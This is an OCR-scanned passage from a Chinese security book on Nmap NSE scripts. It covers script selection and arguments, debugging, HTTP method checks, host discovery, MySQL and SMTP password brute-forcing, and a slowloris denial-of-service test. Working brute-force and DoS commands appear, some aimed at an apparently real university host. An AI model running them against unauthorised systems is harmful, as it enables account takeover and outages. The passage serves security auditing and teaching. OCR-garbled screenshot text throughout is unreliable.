个 自己 编写 的 hello.NSE 对 目标 211.81.200.8 进行 检测 ，/NSE/user-defined/ 是 我 自己 创建 的 一 
个 目录 ， 如 图 7-2 所 示 的 hello.NSE 是 我 自行 编写 的 一 个 脚本 。 

如 果 想 同时 执行 banner.NSE 和 这 个 hello.NSE 脚本 就 可 以 使 用 如 下 命令 。 

Nmap --script /Nmap/scripts/banner.NSE, /NSE/user-defined/hello.NSE 211.81.200.8 

如 果 想 要 执行 文件 夹 中 的 全 部 脚本 ， 例 如 执行 如 图 7-3 所 示 的 /NSE/user-defined/ 下 的 所 
有 脚本 。 





peers EE 








E 图 图 B 图 E 
http-testn — testnse ftp-testns hellonse http-testn — testnse 
Ed 7-2 自 定 义 的 hello.NSE 图 7-3 /NSE/user-defined/ 下 的 所 有 脚本 
那么 也 可 以 使 用 目录 作为 参数 。 


Nmap --script /NSE/user-defined/ 211.81.200.8 
Nmap 也 可 以 使 用 表达 式 来 选择 要 执行 的 脚本 ， 下 面 给 出 了 一 些 例子 ， 在 这 些 例 子 中 使 
用 了 “not”“or”“and” 等 运算 符 来 选择 脚本 。 
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例如 想 使 用 除了 exploit 分 类 以 外 的 所 有 脚本 对 目标 进行 检测 ， 命 令 如 下 。 

Nmap -sV --script "not exploit" 211.81.200.8 

如 果 想 使 用 除了 intrusive, dos, exploit 分 类 以 外 的 所 有 脚本 对 目标 进行 检测 ， 命 令 如 下 。 

Nmap --script "not (intrusive or dos or exploit)" -sV 211.81.200.8 

如 果 只 使 用 broadcast 和 discovery 分 类 的 脚本 对 目标 进行 检测 ， 命 令 如 下 。 

Nmap --script "broadcast and discovery" 211.81.200.8 

NSE 中 还 支持 通配符 “*” 的 使 用 ， 例 如 在 对 一 台 运 行 着 SNMP 服务 的 计算 机 进行 检测 
时 ， 如 果 和 希望 使 用 所 有 与 SNMP 相关 的 脚本 (例如 snmp-brute, snmp-win32-users 等 )， 就 可 
以 使 用 如 下 命令 。 

Nmap --script "snmp-*" 211.81.200.8 

NSE 中 也 支持 对 分 类 和 运算 符 的 结合 操作 ， 例 如 希望 对 一 个 FTP 服务 器 进行 审计 ， 但 
是 不 希望 使 用 intrusive 分 类 中 的 脚本 ， 就 可 以 使 用 如 下 命令 。 


Nmap --script "ftp-* and not(intrusive)" 211.81.200.8 


7.2 ”如何 向 NSE 脚本 传递 参数 


7.2.1 NSE 中 传递 参数 的 方式 

Nmap 使 用 --script-args 来 指定 NSE 脚本 运行 时 的 参数 。 例 如 ， 在 第 一 个 枚 举目 标 服务 
器 上 所 有 方法 时 所 使 用 的 那个 实例 。 

Nmap --script http-methods -p80 211.81.200.8 

当 执 行 Nmap 脚本 时 ，Nmap 会 向 目标 服务 器 发 送 数据 包 ，Nmap 数据 包 中 所 包含 的 默 
认 客 户 端 如 图 7-4 所 示 。 


|| Frame 287: 211 bytes on wire (1688 bits), 211 bytes captured (1688 bits) on interface 9 
| Ethernet II, Src: Universa 3c:59:11 (fc:4d:d4:3c:59:11), Dst: Hangzhou 53:fa:dO (00:23:89:53:fa:d0) 
b Internet Protocol Version 4, Src: 10.16.39.44, Dst: 211.81.200.8 

| Transmission Control Protocol, Src Port: 29984 (29984), Dst Port: 80 (80), Seq: 1, Ack: 1, Len: 157 





[Expert Info (Chat/Sequence): OPTIONS / HTTP/1.1\r\n] 
Request Method: OPTIONS 

Request URI: / 

Request Version: HTTP/1.1 

















[User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)WAn 
SEATED EI = 





图 7-4 使 用 Wireshark 查看 接收 数据 包 的 客户 端 
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这 种 客户 端 一 般 会 被 安全 机 制 拒绝 ， 那 么 可 以 使 用 --script-args 修改 这 个 客户 端 ( http. 


useragent) 为 Mozilla 42。 


Nmap -p 80 --script http-methods --script-args http.useragent-"Mozilla 42" 


211.81.200.8 


户 端 已 经 被 修改 为 Mozilla 42。 


图 7-5 是 捕获 到 的 已 经 修改 了 客户 端的 数据 包 。 从 捕获 到 的 数据 包 可 以 看 出 ， 这 时 的 客 











^ Frame 3003: 142 bytes on wire (1136 bits), 142 bytes captured (1136 bits) on interface 0 


Internet Protocol Version 4, Src: 10.16.39.44, Dst: 211.81.200.8 
Transmission Control Protocol, Src Port: 30025 (30025), Dst Port: 80 (80), Seq: 1, Ack: 1, 


[Expert Info (Chat/Sequence): OPTIONS / HTTP/1.1\r\n] 
Request Method: OPTIONS 

Request URI: / 

Request Version: HITP/1.1 





\r\n 
[Full request URI: http://luf.tstc.edu.cn/] 





Ethernet II, Src: Universa 3c:59:11 (fc:4d:d4:3c:59:11), Dst: Hangzhou 53:fa:d0 (00:23:89:53:fa:d0) 


User-Agent: Mozilla 42\r\n 







Len: 88 












图 7-5 使 用 Wireshark 查看 到 修改 以 后 的 数据 包 客 户 端 


7.2.2 ”从 文件 中 载 入 脚本 的 参数 
如 果 和 希望 一 次 性 执行 多 个 脚本 ， 参 数 的 数量 就 会 变 得 很 多 ， 此 时 可 以 使 








用 --script-args- 


file 来 指定 一 个 文本 文件 ， 然 后 将 所 有 需要 参数 的 值 都 写 在 这 个 文本 中 。 但 是 要 注意 这 个 文 


本 文件 中 的 所 有 参数 都 要 使 用 换行 符 分 隔 开 。 
例如 ， 图 7-6 给 出 了 一 个 参数 的 列表 。 








http. useragent= “Mozilla 42" 

http. max-connections=100 

userdb= /data/user-defined/users. lst 
pese /data/user-defined/passwords. lst 





1f. S17 








图 7-6 将 所 有 需要 参数 的 值 都 写 在 myargs.txt 文件 中 
例如 ， 执 行 如 下 这 个 命令 。 


Nmap --script "http-*" --script-args-file myargs.txt 211.81.200.8 


运行 这 个 命令 时 ， 所 有 的 参数 就 会 按照 这 个 文件 中 的 内 容 执行 。 
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7.2.3 NSE 脚本 调试 


如 果 不 仅仅 想 利 用 Nmap 脚本 的 强大 实力 ， 还 想 进 一 步 了 解 脚本 的 原理 ， 例 如 ， 查 看 
exploit 种 类 中 脚本 所 发 送 的 payload 就 可 以 使 用 这 个 命令 。 
Nmap --script http-methods --script-trace 211.81.200.8 


-script-trace 执行 的 效果 如 图 7-7 所 示 。 


(D REO 帮助 HH) 
目标 (211812008 -| Em 





























命令 ; nmap --script-trace -script http-methods 211.81.200.8 








Nmap SRCVS | 拓 # | sues | inn 
nmap --script-trace --script http-methods 211.81.200.8 

















Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-04 14:32 ?D1G+éx?8+7? 


c 

NSE: TCP 10.16.39.44:31034 > 211.81.200.8:80 | 00000000: 4f SO 54 49 4f 4e 53 20 

2f 20 48 54 54 S0 2f 31 OPTIONS / HTTP/1 

3a 20 .1 Connection: 

65 6e close User-Agen 

20 28 t: Mozilla/S.8 ( 

61 70 compatible; Nmap 

69 6e Scripting Engin 

70 2e e; https://nmap. 

74 6d org/book/nse.htm 

2e 74 1) Host: jcjy.t 
Stc.edu.cn 


PUNSENDSDR 


$8 98988688S 


BEPRRIWES 


x 
7 
2 
E 
2 
2 
7 
6 
ea 


00000000: 48 54 54 50 2f 31 


61 74 65 20 30 nd Date: Fri, © 

20 32 30 33 31 4 Nov 2016 06:31 

69 6f :19 GMT Locatio 

20 68 74 74 73 n: http://wn.ts 

2e 65 64 74 65 tc.edu.cn Conte 
2d 4c 65 30 36 0d Qa nt-Length: 206 

6* 73 Connection: clos 

65 3a e Content-Type: 

6172 text/html; char 
set=iso-8859-1 

<!1DOCTYPE HTML 

PUBLIC "-//IETF 

//OTO HTML 2.0// 

EN"» «html»«head 

> «title»302 Fou 

nd</title> «/hea 

d»«body» «hl»Fou 

mÁCISTS enThe A 


T9SYERRBZBRTTS 























图 7-7 使 用 --script-trace 扫描 的 结果 


也 可 以 使 用 -d[1-9] 切换 到 调试 模式 ， 使 用 -d 意味 着 进入 调试 模式 ， 后 面 的 数字 是 一 个 
从 1 到 9 的 值 ， 这 个 数 越 大 ， 输 出 就 越 详 细 。 

Nmap -sV --script http-methods -d3 211.81.200.8 

执行 的 效果 如 图 7-8 所 示 。 

使 用 --packet-trace 选项 可 以 查看 所 有 发 送 和 收 到 的 数据 包 。 


Nmap --script http-methods --packet-trace 211.81.200.8 


执行 的 效果 如 图 7-9 Bra o 
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AHO IRD KEO Sr) 





211.81.2008 


























nmap -d3 -script hup-methods 211.61.200.8 




















nmap [acu | ear | sce [| 
nmap -d3 —script http-methods 211812008 


Trying to initialize Windows pca» engine 
npcap service is already running. 

Minpcap present, dyramic linked to: Npcap version 9.10 r2, based on libpcap 
version 1.9.9-PRt-GIT 


























Starting Nmap 7.30 ( ntips://nmap.org ) at 2016-11-04 14: 


Fetchfile found CzNProgran Files (x6) Wmap/rmap-services 
PORTS: Using top 1960 ports found oper (TCP:1000, UDP:O, SCTP:0) 
Fetchfile found C:\Program Files (x6) Vimap/rmap.xsl 


hestgrcups: min 1, max 100000 
rtt-tlmecuts: Init 1000, min 196, max 10000 
max-scan-delay: TCP 1009, UDP 109€, SCT? 1600 
parallelism: min 6, max © 


NSE: Using Lus 5.3. 

Tetchfils found Ci\Progron Files (X86) Wmap/rse, nain.lus 
Fetch'ile found C:Wrogram riles (xt6)Wmap/nselib/ipeg-utility.iua 
Fetchtile found C:\Program Files (x6) Vimap/rselib/stcnse.lua 
Fetchrile found C:\Progran (x86) Mimap/rselib/strict.lua 
Fetchfile found C:\Program Files (x86) Vimap/scriptsiscript.db 

NSE: Argumente From CLT 

Fetchřile found C:\Program Files (x86)\Nmap/scripts \http-nethods.nse 
NSE: Serdpt http-methods.nse was selected by name. 
Fetchlle found C:\Program Files (x86) Wmap/rselib/http.lua 
retcnrile found C:\Progran Files (xt6) map/rselib/Dasesa.1ua 
Fetchfile found C:\Progran Files (xB6) imap/rselib/bir.lui 
Fetchfile found C:\Progran Files (x£6) imap/rselib/bit.lu 
Fetchfile found C:\Propran Files (x86) Mimap/rselib/comm.lua. 
Feteheile found C:\Program Files (xBA)\limap/neelib/chortport 
Fetchiile found C:\Program (x86) \map/ nselib/unittest. iua 
Tetchfile found Ci\Progron (X86) Mimap/rselib/nsedebug. lue 


EM Grand NDA Filet lem A man ince RM ctn Y 

































































































nmap --packer-trace --script htip-methods 211.81.200.8 


Nmopiis mcus | eoe | inen | sa 


nmap --packet-trace -ccript hitp-methode 211.81200.8 




















Starting Nmap 7.38 ( https://nmap.org ) at 2016-11-04 14:35 ?D16zex3E423 a 
SENT (2.03785) ICIP [10.16.39.44 > 211.81.200.8 Echo request (type-t/coce-0) 
14-17331 sea-0] I? (ttl-42 1d-21196 iplen-28 | 

REVO (2.0378s) ICIP 211.81.200.8 > 10.16.39.44 Echo reply (type-0/coce-8) 

id=27931 sea=8] I? [ttleGl id«41892 iplens28 | 

SENT (9.95585) TCP 10.15.39.44:57148 > 211.81.200.8:199 S ttle44 id-46987 

iplen=44 seq=2489250670 win-1024 «nss 1460» 

SENT (9.95585) TC? 10.15.39.44:57148 > 211.81.200.8:8080 5 tt1-59 ic«24136 

iplen=44 seq=2489250670 win-1024 «nss 1460» 

SENT (9.95585) TCP 10.15.39.44:57148 > 211.81.200.8:993 S ttl«39 id-54163 

iplen=44  seq«2183250670 win=1024 <nss 
SENT (9.95505) TCP 10.16.39.44:57148 > 
iplen=44  seq«2183250670 win=1024 <nss 
SENT (9.95505) TC? 10.16.39.44:57148 > 
iplen=44  seq«2183250670 win=1024 <nss 
SENT (9.95505) TC? 10.15.39.44:57148 > 211.81.200.8:445 S tt1=57 id-14756 
iplen=44 seq=2489250670 win-1024 «mss 1460» 

SENT (9.95585) TC? 10.15.39.44:57148 > 211.81.200.8:113 S tt1-43 id-53471 
iplen=44 seq=2489250670 win-1024 «mss 1460» 

SENT (9.95605) TC? 10.15.39.44:57148 > 211.81.200.8:139 S tt1=55 
iplen=44 seq=2489250670 win-1024 «mss 1460» 

SENT (9.9565) TC? 10.16.39.44:57148 > 211.81.200.8:1720 5 tt1-40 ic-46526 
iplen=44 seq=2489250670 win-1024 <nss 1460» 

SENT (9.9565) TC? 10.16.39.44:57148 > 211.81.200. 
520-2183250578 win=1024 «mss 1460» 























id«57356 














id-26818 











3 5 tti=54 id=1440 iplen=44 








RCVD (9.9718s) TC? 211.81.200.8:1025 > 10.16.39.44:57148 RA tt1-61 id-O iplen-4t 
segð wine 
REVD (9.97185) 199 > 10.16.39.44:57148 RA tt1-61 ic-e ipler=48 
seq-0 wine 
RCVD (9.97185) 1720 > 10.16.39.44:57148 RA ttl-61 ide8 iplen=48 
stað win-8 





SENT (9.97385) 257148 » 211.81.200. 
iplen=44 seq=2489250670 win-1824 <nss 1460» 
SENT (9.97385) TC? 10.16.39.44:57148 > 211.81.200. 






































图 7-9 指定 —-packet-trace 选项 后 的 扫描 结果 
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7.4 NSE 常见 脚本 的 应 用 


Nmap 的 基本 功能 只 包括 主机 发 现 、 端 口 扫描 、 操 作 系统 和 服务 检测 功能 ， 而 NSE 进 一 
步 实现 了 大 量 的 高 级 功能 ， 本 节 介绍 NSE 的 一 些 常见 高 级 功能 。 


7.4.1 信息 收集 类 脚本 


信息 收集 是 NSE 的 一 个 非常 实用 的 功能 ，NSE 中 的 大 量 脚本 都 实现 了 这 个 功能 。 这 些 
脚本 使 用 不 同 的 技术 和 方法 完成 了 对 目标 的 各 种 信息 的 收集 。 本 小 节 以 一 台 Web 服务 器 为 
目标 ， 利 用 脚本 http-methods 查看 目标 服务 器 所 支持 的 HTTP 方法。 下 面 给 出 了 脚本 http- 
methods 的 详细 信息 。 

基于 脚本 http-methods 的 审计 目的 ，Web 服务 器 需要 支持 HTTP 方法 ， 才 能 正确 提供 
HTTP 服务 。 这 些 方法 不 尽 相 同 ， 常 见 的 主要 有 以 下 几 种 。 

O GET: 请 求 指定 的 页 面 信息 ， 并 返回 实体 主体 。 

O HEAD: 类 似 于 GET 请 求 ， 只 不 过 返回 的 响应 中 没有 具体 的 内 容 ， 用 于 获取 报头 。 

口 POST: 向 指定 资源 提交 数据 进行 处 理 请 求 (例如 提交 表单 或 者 上 传 文件 )。 

口 PUT: 从 客户 端 向 服务 器 传送 的 数据 取代 指定 文档 的 内 容 。 

口 DELETE: 请 求 服务 器 删除 指定 的 页 面 。 

O OPTIONS: 允许 客户 端 查 看 服务 器 的 性 能 。 

O TRACE: 回 显 服务 器 收 到 的 请 求 ， 主 要 用 于 测试 或 诊断 。 


1. 脚本 http-methods 审计 方法 

脚本 http-methods 的 原理 就 是 通过 Nmap 向 目标 服务 器 发 送 请 求 ， 来 判断 目标 服务 器 所 
支持 的 HTTP 方法。 在 Nmap 中 需要 使 用 --script 来 指定 所 使 用 的 脚本 ， 如 果 现 在 使 用 脚本 
http-methods, ， 就 需要 使 用 命令 “--script http-methods”。 


2. 脚本 http-methods 审计 命 

目标 211.81.200.8 是 一 台 对 外 提供 HTTP 服 务 的 Web 服 务 器 ,现在 要 对 目标 
211.81.200.8 进行 安全 审计 ， 来 获得 这 台 服 务 器 所 支持 的 HTTP 方法 。 执 行 的 命令 如 下 。 

Nmap -p 80,443 --script http-methods 211.81,200.8 

其 中 ,“-p 80,443” 指 定 了 目标 端口 ，--script http-methods 指定 了 使 用 的 方法 。 
图 7-10 给 出 了 使 用 脚本 http-methods 的 审计 结果 。 

从 图 7-10 所 示 的 审计 结果 中 可 以 看 出 ， 目 标 服务 器 所 支持 的 方法 有 GET、HEAD、 
POST, PUT, DELETE, TRACE, OPTIONS 等 7 种 ， 存 在 风险 的 方法 有 PUT、DELETE、 
TRACEE。 
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Bao) | Nmap | 主机 | 拓扑 | eee | e 


nmap -p 80,443 --script http-methods 211.81.200.8 [-] E pa 











Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-04 14:37 ?D1útêx?è 
二 3? 


Nmap scan report for math.tstc.edu.cn (211.81.200.8) ll 
Host is up (0.0021s latency). 


|. Potentially risky methods: PUT DELETE TRACE 
443/tcp closed https I 


Nmap done: 1 IP address (1 host up) scanned in 10.09 seconds 

















图 7-10 对 目标 服务 器 所 支持 的 HTTP 方法 进行 审计 


3. 脚本 http-methods 审计 扩展 

不 同 的 Web 服务 器 支持 的 方法 并 不 相同 ， 这 主要 取决 于 发 布 Web 服务 所 使 用 的 软件 以 
及 它 的 配置 情况 。 不 过 在 某 些 时 候 这 些 方法 可 能 成 为 系统 的 漏洞 。 渗 透 者 在 入 侵 前 需要 使 用 
某 种 方法 来 探测 出 这 些 方法 。 作 为 网 络 守 护 者 的 我 们 需要 提前 发 现 这 些 危 险 ， 将 这 些 危 险 变 
成 现实 之 前 对 其 进行 修复 。 

目前 HTTP 的 TRACE、CONNECT、PUT 和 DELETE 方 法 都 可 能 是 Web 服务 器 中 一 
种 潜在 的 安全 风险 。 尤 其 是 ， 如 果 目 标 服务 器 支持 TRACE 方法 ,就 有 可 能 会 遭受 一 种 名 
为 Cross Site Tracing ( XST) 的 攻击 。 在 这 种 攻击 中 ,攻击 者 将 恶意 代码 岩 入 一 台 已 经 被 控 
制 的 主机 的 Web 文件 中 ， 当 访问 者 浏览 时 恶意 代码 在 浏览 器 中 执行 ， 然 后 访问 者 的 cookie、 
HTTP 基本 验证 以 及 ntlm 验证 信息 将 被 发 送 到 已 经 被 控制 的 主机 ， 同 时 传送 Trace 请 求 给 目 
标 主机 ， 导 致 cookie 欺骗 或 者 是 中 间 人 攻击 。 因 此 渗透 者 在 发 起 XST 攻击 之 前 ， 就 要 验证 
目标 服务 器 是 否 支 持 这 个 方法 。 


注意 
当 在 执行 Nmap 脚本 的 时 候 ，Nmap 会 向 目标 服务 器 发 送 数 据 包 ，Nmap 中 所 包含 的 
默认 客户 端 一 般 会 被 这 种 安全 机 制 拒绝 ， 那 么 可 以 使 用 http.useragent 来 修改 这 个 客户 端 
为 Mozilla 42: 




















Nmap -p 80 --script http-methods--script-args http.useragent-"Mozilla 42" <target> 


有 一 些 Web 服务 器 允许 在 一 个 数据 包 中 包含 多 个 HTTP request， 这 将 有 助 于 加 快 
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HTTP 脚本 的 执行 速度 。 可 以 使 用 HTTP pipelining 来 调整 HTTP request 的 数量 。 





Nmap -p 80 --script http-methods--script-args http.max-pipeline-10 «target» 


7.4.2 ”高 级 主机 发 现 类 脚本 
NSE 在 扫描 方面 十 分 灵活 ， 很 多 脚本 利用 各 种 各 样 的 技术 来 完成 高 级 的 主机 发 现 。 


1. 脚本 broadcast-ping.NSE 

审计 目的 : 发 现 本 地 网 络 中 的 活跃 主机 ，Nmap 中 也 能 实现 这 个 技术 ,但 是 通过 向 本 地 
网 络 中 每 一 个 IP 地 址 发 送 单 播 探 针 数据 包 来 实现 的 。 

审计 方法 : 与 上 面 提 到 的 发 送 单 播 探 针 数 据 包 不 同 ， 这 个 脚本 发 送 的 广播 探 针 数据 包 ， 
也 就 是 向 整个 本 地 网 络 中 所 有 的 TP 地 址 发 送 广播 包 。 这 个 脚本 的 使 用 并 不 需要 任何 的 目标 ， 
它 默认 以 你 所 在 的 网 络 为 目标 ,例如 你 所 在 的 网 络 IP 地 址 为 192.168.0.0/24， 扫 描 的 范围 也 
是 这 个 地 址 。 

审计 命令 : 脚本 broadcast-ping 的 审计 命令 如 下 所 示 。 

Nmap --script broadcast-ping 

审计 结果 : 脚本 broadcast-ping 的 审计 结果 如 下 所 示 。 


Pre-scan script results: 

| broadcast-ping: 

I IP: 192.168.0.20 MAC: 07:11:27:36:4f:81 

I IP: 192.168.0.26 MAC: 51:23:c4:3f:d7:44 

| Use --script-args=newtargets to add the results as targets 


WARNING: No targets were specified, so 0 hosts scanned. 
Nmap done: 0 IP addresses (0 hosts up) scanned in 4.31 seconds 


这 表明 本 地 网 络 中 当前 有 两 台 活跃 主机 。 

接 下 来 介绍 另 一 个 脚本 targets-snifferNSE。 

2. 脚本 targets-sniffer 

审计 目的 : 发 现 本 地 网 络 中 的 所 有 主机 。 

审计 方法 : 脚本 targets-sniffer 的 审计 方法 十 分 特殊 ， 它 会 对 你 所 在 的 网 络 进行 嗅 探 ， 然 
后 发 现 网 络 中 的 所 有 主机 。 同 样 这 个 脚本 的 审计 目标 也 是 以 你 所 在 的 网 络 为 目标 ， 例 如 你 所 
在 的 网 络 IP 地 址 为 192.168.0.0/24， 扫 描 的 范围 也 是 这 个 地 址 。 这 个 脚本 需要 特权 模式 ， 也 
可 以 使 用 -e 来 执行 网 络 监听 的 网 卡 设备 。 

审计 命令 : 脚本 targets-sniffer 的 审计 命令 如 下 。 

Nmap -sL --script-targets-sniffer -e «interface» 


审计 结果 : 脚本 targets-sniffer 的 审计 结果 如 下 。 


Pre-scan script results: 
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targets-sniffer: Sniffed 4 address (es) . 

192.168.0.1 

192.168.0.3 

192.168.0.35 

192.168.0.100 

WARNING: No targets were specified, so 0 hosts scanned. 

Nmap done: 0 IP addresses (0 hosts up) scanned in 10.30 seconds 


这 表明 本 地 网 络 中 当前 有 4 台 活 跃 主机 。 


7.4.3 ”密码 审计 类 脚本 


网 络 上 提供 的 服务 一 般 都 具有 一 定 的 认证 措施 ， 目 前 应 用 最 为 广泛 的 认证 措施 还 是 用 户 
名 和 密码 。 这 种 认证 措施 的 优势 在 于 简单 易 行 ， 而 缺点 在 于 很 多 用 户 意识 不 到 密码 强度 的 重 
要 性 ， 往 往 会 选择 一 些 简单 容易 记 住 的 密码 ， 而 这 些 密码 很 容易 被 渗透 者 猜 出 来 ， 因 此 网 络 
的 管理 者 需要 一 个 有 效 的 工具 来 对 自己 网 络 中 各 种 服务 的 密码 强度 进行 审计 。 

在 现代 的 信息 管理 系统 中 ， 所 有 的 数据 都 保存 在 数据 库 中 。 因 此 数据 库 的 安全 性 不 言 而 
喻 ,目前 市 面 上 常见 的 数据 有 MySQL. MSSQL, Oracle, Access 等 很 多 种 ，NSE 中 也 包含 
了 大 量 针对 这 些 数据 库 进 行 审计 的 脚本 。 这 里 以 脚本 mysql-brute.NSE 为 例 。 


1. 脚本 mysql-brute.NSE 

审计 目的 : 发 现 网 络 中 那些 使 用 弱 口 令 的 MySQL 数据 库 。 

审计 方法 : 脚本 mysql-brute.NSE 的 审计 方法 其 实 很 简单 ， 在 Nmap 中 有 两 个 数据 文件 ， 
一 个 文件 中 包含 一 些 常见 的 用 户 名 ， 另 一 个 文件 中 包含 有 一 些 常 见 的 密码 ， 这 个 脚本 将 这 两 
个 文件 中 的 用 户 名 和 密码 进行 组 合 然后 尝试 登录 。 

审计 命令 : 假设 目标 主机 192.168.153.132 上 运行 着 一 个 MySQL 数据 库 ， 现 在 使 用 
mysgl-brute.NSE 对 这 个 数据 库 进行 审计 工作 ， 命 令 如 下 。 

Nmap -p 3306 --packet-trace --script mysql-brute 192.168.153.132 

审计 结果 : 脚本 mysgl-brute.NSE 的 审计 结果 如 下 。 


-- 3306/tcp open mysql 

-- | mysql-brute: 

=S Accounts 

il root:root - Valid credentials 


这 里 可 以 看 出 来 ， 目 标 主 机 上 和 运行 的 MySQL 上 存在 一 个 十 分 简单 的 弱 口 令 : 用 户 名 
root， 密 码 root。 























2. 脚本 smtp-brute.NSE 
smtp-brute.NSE 脚本 用 来 检测 目标 邮件 服务 器 SMTP 服务 的 密码 是 否 够 强壮 。 
审计 目的 : 邮件 服务 器 中 经 常会 存储 一 些 非常 重要 的 信息 ， 而 对 用 户 进行 认证 的 方式 





就 是 用 户 名 和 密码 ， 如 果 这 是 
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存在 一 些 简单 的 账户 名 和 密码 ， 它 们 将 很 容易 成 为 黑客 的 牺牲 


品 。 因 此 需要 先 对 服务 器 进行 弱 口 令 检查 。 

审计 方法 : 对 SMP 密码 审计 的 方法 采用 暴力 穷 解 的 方式 。Nmap 中 有 一 个 名 为 smtp-brute. 
NSE 的 脚本 ， 这 个 脚本 可 以 支持 对 SMTP 密码 的 暴力 穷 解 ， 它 支持 LOGIN、PLAIN、CRAM- 
MD5、DIGESTMD5 和 NTLM 四 种 登录 方式 。 默 认 情况 下 , smtp-brute.NSE 会 使 用 /NSElib/data/ 
usernames.lst 文件 中 的 各 项 作为 用 户 名 ，/NSElib/data/passwords.lst 文件 中 的 各 项 作为 密码 。 

审计 命令 : 假设 目标 主机 211.81.200.8 是 一 台 对 外 提供 SMTP 服务 的 邮件 服务 器 ， 现 在 


要 对 这 个 目标 进行 安全 审计 ， 
的 命令 如 下 。 


重点 检查 这 台 服 务 器 中 的 邮件 账号 和 密码 是 否 足够 强壮 ， 执 行 


Nmap -p 25 --script smtp-brute «target» 


审计 结果 : 脚本 smtp-brute.NSE 的 审计 结果 如 下 。 


-- 25/tcp open stmp 
-- | smtp-brute: 
-- | Accounts 


syn-ack 


em braddock:jules - Valid credentials 
ei lane:sniper - Valid credentials 
emu] parker:scorpio - Valid credentials 


sm Statistics 


sei Performed 1160 guesses in 41 seconds, average tps: 33 


根据 上 面 扫描 的 结果 ， 可 以 看 出 当前 SMTP 服务 器 中 存在 至 少 三 个 弱 口 令 的 账户 ,分 别 
是 braddock:jules、lane:sniper、parker:scorpio。 

审计 扩展 : 可 以 通过 指定 参数 的 方式 来 改变 所 使 用 的 用 户 名 和 密码 ， 例 如 想 将 用 户 名 换 
成 /var/usernames.txt， 密 码 换 成 /var/passwords.txt。 


Nmap -p 25 --script smtp-brute --script-args userdb-/var/usernames.txt, passdb- 


/var/passwords.txt 


如 果 只 需要 一 个 正确 的 账户 就 可 以 停止 扫描 ， 可 以 使 用 brute.firstOnly 参数 。 

Nmap -p 25 --script smtp-brute --script-args brute.firstOnly «target» 

另外 ， 这 个 脚本 也 支持 多 种 不 同 的 破解 顺序 ， 由 参数 brute.mode 指定 。 

口 User 模式 ， 这 种 模式 先 取 一 个 用 户 名 ， 然 后 使 用 所 有 的 密码 与 其 配对 ， 当 所 有 组 合 都 
结束 后 ， 再 开始 下 一 个 用 户 名 。 

Nmap --script smtp-brute --script-args brute.mode-user «target» 

Q pass 模式 ， 这 种 模式 先 取 一 个 密码 ， 然 后 使 用 所 有 的 用 户 名 与 其 配对 ， 当 所 有 组 合 都 
结束 后 ， 再 开始 下 一 个 密码 。 


Nmap --script smtp-brute --script-args brute.mode-pass «target» 


O 这 种 模式 与 前 两 种 不 同 ，creds 中 所 有 的 用 户 名 和 密码 都 写 在 同一 个 文件 中 ， 格 式 类 
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似 于 admin/123456 这 种 形式 , Nmap 会 读 取 其 中 的 每 一 行 ， 然 后 访问 服务 器 进行 匹配 。 


Nmap --script smtp-brute --script-args brute.mode-creds,brute.credfile-./creds.txt «target» 


7.4.4. “漏洞 扫描 类 脚本 

这 个 种 类 的 脚本 可 能 是 最 振奋 人 心 的 部 分 了 ， 在 进行 渗透 测试 这 场 对 抗 赛 中 ， 入 侵 者 会 
为 发 现 了 目标 的 一 个 漏洞 而 感到 欢欣 鼓舞 ， 守 卫 者 也 会 为 系统 中 的 漏洞 提心吊胆 。NSE 脚本 
扩充 漏洞 扫描 的 功能 ， 利 用 这 些 脚本 ， 就 可 以 使 用 Nmap 对 目标 的 漏洞 进行 扫描 ， 从 而 简化 
工作 。 


1. 脚本 http-slowloris.NSE 

审计 目的 : Slowloris 是 在 2009 年 由 著名 Web 安全 专家 RSnake 提出 的 一 种 攻击 方法 ， 
其 原理 是 以 极 低 的 速度 向 服务 器 发 送 HTTP 请 求 。 由 于 Web Server 对 于 并 发 的 连接 数 都 有 一 
定 的 上 限 ， 因 此 ， 如 果 恶 意 占用 这 些 连 接 不 释放 ， 那 么 Web Server 的 所 有 连接 都 将 被 恶意 连 
接 占 用 ， 从 而 无 法 接受 新 的 请 求 ， 导 致 拒绝 服务 。 

审计 方法 : Nmap 中 有 http-slowloris 这 个 脚本 ， 脚 本 的 原理 是 向 目标 发 起 连接 ， 并 保持 
住 这 个 连接 ， 其 中 http-slowloris 脚本 构造 了 一 个 畸形 的 HTTP 请 求 ， 准 确 地 说 ， 是 一 个 不 完 
整 的 HTTP 请 求 。 


GET / HTTP/1.1\r\n 

HOST: host\r\n 

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; 
.NET CLR 1.1.4322; .NET CLR 2.0.50313; ? ? .NET CLR 3.0.4506.2152; .NET CLR 
3.5.30729; MSOffice 12)\r\n 

Content-Length: 42\r\n 


在 正常 的 HTTP 包 头 中 ， 是 以 两 个 CLRF 表示 HTTP Headers 部 分 结束 的 。 由 于 Web 
Server 只 收 到 一 个 mn， 因此 将 认为 HTTP Headers 部 分 没有 结束 ， 并 保持 此 连接 不 释放 ， 继 
续 等 待 完整 的 请 求 。 此 时 客户 端 再 发 送 任意 HTTP 头 ， 保 持 住 连接 即 可 。 当 构造 多 个 连接 
后 ， 服 务 器 的 连接 数 很 快 就 会 达到 上 限 。 

审计 命令 : 目标 211.81.200.8 是 一 台 对 外 提供 HTTP 服务 的 Web 服务 器 ， 现 在 要 对 这 
个 目标 进行 安全 审计 ， 以 检查 这 个 服务 器 是 否 能 抵御 slowloris Dos 攻击 。 执 行 的 命令 如 下 。 

Nmap -p 80 --script http-slowloris --max-parallelism 300 «target» 


审计 结果 : 脚本 http-slowloris.NSE 的 审计 结果 如 下 。 


PORT STATE SERVICE REASON 

80/tcp open http syn-ack 
| http-slowloris: 

| Vulnerable: 

| the DoS attack took +5m35s 
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l with 300 concurrent connections 
| and 900 sent queries 


根据 审计 结果 ， 可 以 看 出 目标 服务 器 不 具备 防御 slowloris DoS 攻击 的 能 力 。 

审计 扩展 : 在 进行 审计 的 过 程 中 ， 也 可 以 通过 调整 http-slowloris.send_interval 参数 来 改 
变 扫描 的 过 程 。http-slowloris.send_interval 参数 可 以 指定 发 送 http header datas 的 间隔 ， 默 认 
值 为 100， 现 在 通过 参数 修改 为 300。 


Nmap -p 80 --script http-slowloris --script-args http-slowloris. 
send interval-200 --max-parallelism 300 


http-slowloris.timelimit 参数 指定 Dos 攻击 的 持续 运行 时 间 ， 默 认为 30 分 钟 。 现 在 通过 
